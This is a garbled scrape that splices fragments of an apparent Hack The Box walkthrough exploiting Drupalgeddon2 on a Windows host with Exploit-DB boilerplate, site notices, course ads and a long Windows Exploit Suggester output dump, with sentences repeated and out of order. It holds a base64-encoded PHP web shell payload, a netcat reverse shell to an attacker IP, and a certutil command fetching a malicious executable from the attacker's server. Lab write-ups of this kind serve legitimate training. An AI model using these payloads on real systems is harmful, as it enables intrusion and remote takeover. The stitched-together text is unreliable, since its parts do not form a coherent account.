SearchSploit Manual. GHDB. It is currently the 150th most used plugin of Drupal, with around 45.000 active websites. Drupal 7; Drupal 8; Execution mode. Your email address will not be published. Here’s a little tip that may come in handy when working with binary files. [*] Testing: Existing file (http://10.10.10.9/shell.php), [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php. Firstly, we can modify our exploit code to tunnel through a proxy in order to aid in identifying what occurs when we launch our attack: Starting on line 25, we’ll set $proxy_addr to our localhost and use Burp Suite to intercept the traffic. How to use Sherlock.ps1 and Powershell Empire (PowerUp.ps1) How to hijack a session using a cookie with BurpSuite; How to hijack a session using a cookie with Google Chrome ; How to manipulate PHP-based exploits; How to get a Reverse Shell with Netcat; To carry out this demonstration, we will perform a penetration test on a … [!] producing different, yet equally valuable results. Let’s examine the nature of these vulnerabilities and discuss how we can defend against them: This machine is great for learning about Drupal, as well as the infamous ‘Drupalgeddon’ vulnerability. For now, let’s continue by opening up a listener on our local machine to catch our reverse shell: With our listener ready, we will return to our exploit once more to send a reverse shell using the netcat executable: drupalgeddon2>> nc.exe -e C:\Windows\System32\cmd.exe 10.10.14.52 443. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. The vulnerability occurs due to insufficient user-supplied input sanitization in the Drupal Form API. Excellent, our scans promptly return the version information of the Drupal installation: In addition to these scans, performing file and directory enumeration against the target can also be leveraged to locate the version information manually. 8.2/ VMs. Port 80 is running Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits. We use cookies to ensure that we give you the best experience on our website. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Target is NOT exploitable [2-4] (HTTP Response: 404)… Might not have write access? Two methods are available to trigger the PHP payload on the target: - set TARGET 0: Form-cache PHP injection method (default). easy-to-navigate database. In this writeup we will examine how to achieve an initial foothold by exploiting Drupal, two methods of using RCE to gain a reverse shell, and how to elevate privileges by abusing a vulnerable Windows feature. In this context, investigating the ‘CHANGELOG.txt’ file on the web server will also confirm that the current version of the Drupal installation is 7.54. Port 80 is running Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits. With our executable placed on the target system, we’ll continue by opening up a listener on our local system: Finally, we will utilize our command execution to run the malicious executable and receive a reverse shell: Given that we now have access to a fully functional shell, let’s grab the user.txt flag! other online search engines such as Bing, CVE-2014-3704CVE-113371CVE-SA-CORE-2014-005 . A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. About Us. In versions of Drupal 7, this URI is /user/password. A copy of this updated exploit will be provided separately from this report. There are several forms of this vulnerability that impact different versions of Drupal and many installations still remain to be patched. While 7.59 fixed a lot of it there still remained an exploit through the user/registration form. It should be noted that ‘droopescan’ can take quite awhile to run, but is a great tool all the same. # Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities # Date : 02-03-2012 # Author ... Drupal 7.12 -latest stable release - suffers from multiple vulnerabilities which could allow an attacker to gain access to the management interface. The Form API was first introduced in Drupal 6, allowing for the alteration of data during the form rendering process. Within Kali Linux, there are numerous Windows tools and binaries included by default. Enumeration CMS web application; Writeups. Contribute to pimps/CVE-2018-7600 development by creating an account on GitHub. If this string is returned, then code execution is confirmed. Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. In addition, it is also good practice for exploring how to achieve reverse shells on Windows systems. It is wise to modify the default configuration of applications when hosted in a production environment. Introducion This is a quick post about how to hack this vulnerable virtual machine found in Vulnhub website. We will search for drupal 7 from the list of exploits available , here we will try Drupal 7.x Module Services — Remote Code Execution . With this in mind, it appears that the ‘Drupalgeddon2’ remote code execution exploit will be suitable for attacking our Drupal 7.54 installation: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 – ‘Drupalgeddon2’ Remote Code Execution | php/webapps/44449.rb. We now have remote code execution on the target machine! CVE-2014-3704CVE-113371 . This brings with it a few new features as well as bug fixes. # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity ... For Drupal 7, it is fixed in the current release (Drupal 7.57) for jQuery 1.4.4 (the version that ships with Drupal 7 core) as well as for other newer versions of jQuery that might be used on the site, for example using the jQuery Update module. If taken in the right context, it is a slogan to live by. Shellcodes. Scripts afp-path-vuln This tool will compare the patch level of our target system against the Microsoft vulnerability database to detect potential missing patches. Firstly, I can say with confidence that you will most likely encounter this type of obstacle during both your OSCP exam and real-world engagements. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. Contribute to pimps/CVE-2018-7600 development by creating an account on GitHub. Online Training . How to perform an exploit search with Searchsploit. These property values affect the resulting rendering process and can be used to achieve an AJAX response from the API which serves the rendered requested resource. Here are several that are great for Windows systems: Windows Privilege Escalation Awesome Scripts (WinPEAS), https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS. Since droopescan is not working, we’ll have to manually figure out if these modules are installed. We’ll begin by spinning up our HTTP server once more: Next, we will return to our exploit to download the file from our local system and place it on the remote host: drupalgeddon2>> certutil.exe -urlcache -split -f “http://10.10.14.52:8000/shelly.exe” shelly.exe. So you'll need to set the value from the start. Walkthrough First we do some network discovery with netdiscover:… Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Once our script is placed on the remote host, we can use our script(s) in conjunction with manual enumeration to acquire as much information as possible about the target system. - Numerous API documentation improvements. In most cases, For those preparing for the OSCP exam, the use of Metasploit is avoided if possible. SearchSploit Manual. You must be authenticated and with the power of deleting a node. actionable data right away. About Exploit-DB Exploit-DB History FAQ Search. Services allows you to create different endpoints with different resources, allowing you to interact with your website and its content in an API-oriented way. Drupal faced one of its biggest security vulnerabilities recently. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 MhzBIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018Windows Directory: C:\WindowsSystem Directory: C:\Windows\system32Boot Device: \Device\HarddiskVolume1System Locale: el;GreekInput Locale: en-us;English (United States)Time Zone: (UTC+02:00) Athens, Bucharest, IstanbulTotal Physical Memory: 2.047 MBAvailable Physical Memory: 1.570 MBVirtual Memory: Max Size: 4.095 MBVirtual Memory: Available: 3.595 MBVirtual Memory: In Use: 500 MBPage File Location(s): C:\pagefile.sysDomain: HTBLogon Server: N/AHotfix(s): N/ANetwork Card(s): 1 NIC(s) Installed. Papers. This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. Search EDB. Personally, I tend to habitually compress binary files before attempting a file transfer. 9 CVE-2018-7600: 20: Exec Code 2018-03-29: 2018-06-11: 7.5. 8.1/ Pwn. C:\inetpub\drupal-7.54>dir C:\Usersdir C:\UsersVolume in drive C has no label.Volume Serial Number is 605B-4AAA, 19/03/2017 08:35 ��

.19/03/2017 08:35 �� ..19/03/2017 02:20 �� Administrator19/03/2017 02:54 �� Classic .NET AppPool19/03/2017 08:35 �� dimitris14/07/2009 07:57 �� Public0 File(s) 0 bytes6 Dir(s) 30.807.928.832 bytes free, C:\inetpub\drupal-7.54>cd C:\Users\dimitris\Desktopcd C:\Users\dimitris\Desktop. It is crucial to ensure that software is regularly updated so that these vulnerabilities are patched. A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. 7 CVE-2017-6932: 601: 2018-03-01: 2018-03-22: 5.8. UPX is a tool that can be utilized to compress binaries. However, it appears that we lack the ability to write a web shell to the system. Vind de perfect datum om uw cursus te boeken met Firebrand Training. searchsploit Drupal 7 Great, searchsploit reports that there are numerous exploits for ‘Drupalgeddon’ available. Firstly, we will query ExploitDB using searchsploit: Great, searchsploit reports that there are numerous exploits for ‘Drupalgeddon’ available. Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2). If you found any mistake please let me know. - Logging of searches can now be disabled (new option in the administrative More specifically, this vulnerability occurs due to improperly configured access control list settings on the registry keys for the service tracing feature. This vulnerability was made public on March 28th, 2018 by the Drupal core security team in a security advisory titled SA-CORE-2018-002, which details a remote code execution vulnerability identified as CVE-2018-7600. This PSA is now out of date. If you enjoyed this machine, head over to Hack The Box and give ch4p some respect! Target is NOT exploitable [2-4] (HTTP Response: 404)… Might not have write access?[!] I have been inundated with trolls around the world because of the lastest Drupal exploit. Contribute to ferreirasc/oscp development by creating an account on GitHub. Enumeration CMS web application; Writeups. Displaying 207 of the 207 vulnerabilities found. On Drupal 7 sites with the update status module, Drupal Core will show up as unsupported. webapps exploit for PHP platform Exploit Database Exploits. Given that binary files can often be quite large, transferring these files across a network or writing them to a system’s drive, can potentially attract attention. Exploiting Drupal to get a shell Exploits found on the INTERNET. Reports about Drupal 7 vulnerabilities might become public creating 0 day exploits. this information was never meant to be made public but due to any number of factors this Two of the best enumeration tools I have found for Drupal are ‘droopescan’ and ‘Drupwn’. Excellent, our binary has now been stored on the target system. Let’s check if our compromised user has these rights: Excellent! DIGEST DC-1 is a beginner friendly machine based on a Linux platform.There is drupal 7 running as a webserver, Using the Drupal 7 exploit we gain the initial shell and by exploit … Preparing well for the OSCP is both a simple and difficult task, as the resources available are so numerous.. Once we have acquired this information, we can feed the output into a handy tool known as ‘windows-exploit-suggester.py’. an extension of the Exploit Database. : CVE-2009-1234 or 2010-1234 or 20101234) Log In Register. and other online repositories like GitHub, SearchSploit Manual. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32). The Exploit Database is maintained by Offensive Security, an information security training company that provides various Information Security Certifications as well as high end penetration testing services. While this does not often pose a great threat to being detected, its a good practice to reduce your footprint and the noise you generate whenever possible. Preparing well for the OSCP is both a simple and difficult task, as the resources available are so numerous.. So far, we have achieved remote command execution on the target, leveraged this to gain a shell, and collected our user flag. In addition, there are a slew of other vulnerabilities for Drupal that may be utilized for exploitation. Papers. This vulnerability exists in Drupal versions 7.x before 7.58, 8.3.x versions before 8.3.9, 8.4.x versions before 8.4.6, and 8.5.x before 8.5.1. information and “dorks” were included with may web application vulnerability releases to Official community support for version 7 will end, along with support provided by the Drupal Association on Drupal.org. Enumeration Exploitation Further explaination on our blog post article. An attacker could exploit this vulnerability to take control of an affected system. subsequently followed that link and indexed the sensitive information. The Google Hacking Database (GHDB) 9 CVE-2018-7600: 20: Exec Code 2018-03-29: 2018-06-11: 7.5. Code definitions. Port 80 is running Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits. Enroll in This potentially allows attackers to exploit multiple attack vectors on a Drupal site Which could result in the site being compromised. However, given that our previous Nmap scan did not retrieve the exact version of Drupal 7 running on our target host, we will need to dig … pentest / exploit / drupal-7-x-sqli.py / Jump to. The exploit generates a random string and attempts to have the target echo this string. Now, some of you hackers reading this may have alarm bells going off in your head right now and so did I when first discovering Drupal on this host. About Exploit-DB Exploit-DB History FAQ Search. Both of the tools mentioned can be found at the following links: https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester, python wes.py bastard_sysinfo.txt | tee bastard_vulns_wesng.txt, Date: 20110712CVE: CVE-2011-1282KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110712CVE: CVE-2011-1283KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110712CVE: CVE-2011-1281KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110712CVE: CVE-2011-1285KB: KB2507938Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110412CVE: CVE-2011-0657KB: KB2509553Title: Vulnerability in DNS Resolution Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111213CVE: CVE-2011-3406KB: KB2621146Title: Vulnerability in Active Directory Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Active Directory Lightweight Directory ServicesSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2011-3402KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2011-3402KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2011-3402KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111213CVE: CVE-2011-3408KB: KB2620712Title: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110614CVE: CVE-2011-1869KB: KB2535512Title: Vulnerabilities in Distributed File System Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110614CVE: CVE-2011-1894KB: KB2544893Title: Vulnerability in MHTML Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Information DisclosureExploit: n/a, Date: 20110913CVE: CVE-2011-1984KB: KB2571621Title: Vulnerability in WINS Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120508CVE: CVE-2012-0181KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0181KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0181KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0180KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0180KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0180KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20081111CVE: CVE-2007-0099KB: KB954430Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130108CVE: CVE-2013-0003KB: KB2742598Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130108CVE: CVE-2013-0003KB: KB2756920Title: Vulnerabilities in .NET Framework Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110412CVE: CVE-2010-4701KB: KB2506212Title: Vulnerabilities in Windows Fax Cover Page Editor Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploits: http://retrogod.altervista.org/9sg_cov_bof.html, http://www.exploit-db.com/exploits/15839, Date: 20120814CVE: CVE-2012-2523KB: KB2706045Title: Vulnerability in JScript and VBScript Engines Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: VBScript 5.8Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120814CVE: CVE-2012-2523KB: KB2706045Title: Vulnerability in JScript and VBScript Engines Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: JScript 5.8Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20110412CVE: CVE-2010-3974KB: KB2506212Title: Vulnerabilities in Windows Fax Cover Page Editor Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20110308CVE: CVE-2011-0032KB: KB2479943Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120214CVE: CVE-2012-0149KB: KB2645640Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120612CVE: CVE-2012-0217KB: KB2709715Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploits: https://www.exploit-db.com/exploits/28718/, https://www.exploit-db.com/exploits/46508/, Date: 20130409CVE: CVE-2013-1338KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-1338KB: KB2817183Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 8Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20121211CVE: CVE-2012-1537KB: KB2770660Title: Vulnerability in DirectPlay Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20110913CVE: CVE-2011-1991KB: KB2570947Title: Vulnerability in Windows Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20091013CVE: CVE-2009-2510KB: KB974571Title: Vulnerabilities in Windows CryptoAPI Could Allow SpoofingAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: SpoofingExploit: n/a, Date: 20091013CVE: CVE-2009-2511KB: KB974571Title: Vulnerabilities in Windows CryptoAPI Could Allow SpoofingAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: SpoofingExploit: n/a, Date: 20100608CVE: CVE-2010-1879KB: KB979482Title: Vulnerabilities in Media Decompression Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Asycfilt.dll (COM component)Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110308CVE: CVE-2011-0029KB: KB2483614Title: Vulnerability in Remote Desktop Client Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Remote Desktop Connection 7.0 ClientSeverity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20121113CVE: CVE-2012-2531KB: KB2716513Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft FTP Service 7.5 for IIS 7.5Severity: ModerateImpact: Information DisclosureExploit: n/a, Date: 20121113CVE: CVE-2012-2531KB: KB2719033Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ModerateImpact: Information DisclosureExploit: n/a, Date: 20121113CVE: CVE-2012-2532KB: KB2716513Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft FTP Service 7.5 for IIS 7.5Severity: ModerateImpact: Information DisclosureExploit: n/a, Date: 20121113CVE: CVE-2012-2532KB: KB2719033Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information DisclosureAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft Internet Information Services 7.5Severity: ModerateImpact: Information DisclosureExploit: n/a, Date: 20110111CVE: CVE-2011-0027KB: KB2419640Title: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Data Access Components 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110111CVE: CVE-2011-0026KB: KB2419640Title: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Data Access Components 6.0Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-3229KB: KB2207566Title: Vulnerability in SChannel Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1293KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1293KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20100914CVE: CVE-2010-2729KB: KB2347290Title: Vulnerability in Print Spooler Service Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-3147KB: KB2423089Title: Vulnerability in Windows Address Book Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploits: http://www.attackvector.org/new-dll-hijacking-exploits-many/, http://www.exploit-db.com/exploits/14745/, Date: 20120508CVE: CVE-2012-0161KB: KB2604114Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0160KB: KB2604114Title: Vulnerabilities in .NET Framework Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111108CVE: CVE-2011-2016KB: KB2620704Title: Vulnerability in Windows Mail and Windows Meeting Space Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0162KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0162KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0162KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0165KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0165KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0165KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0164KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0164KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0164KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0167KB: KB2659262Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0167KB: KB2656410Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft .NET Framework 3.5.1Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120508CVE: CVE-2012-0167KB: KB2676562Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and SilverlightAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101214CVE: CVE-2010-3338KB: KB2305420Title: Vulnerability in Task Scheduler Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121113CVE: CVE-2012-1527KB: KB2727528Title: Vulnerabilities in Windows Shell Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-1524KB: KB2719177Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120710CVE: CVE-2012-1522KB: KB2719177Title: Cumulative Security Update for Internet ExplorerAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Windows Internet Explorer 9Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20091013CVE: CVE-2009-2524KB: KB975467Title: Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1294KB: KB2813170Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20121113CVE: CVE-2012-1528KB: KB2727528Title: Vulnerabilities in Windows Shell Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20081111CVE: CVE-2008-4033KB: KB954430Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Microsoft XML Core Services 4.0Severity: CriticalImpact: Remote Code ExecutionExploit: 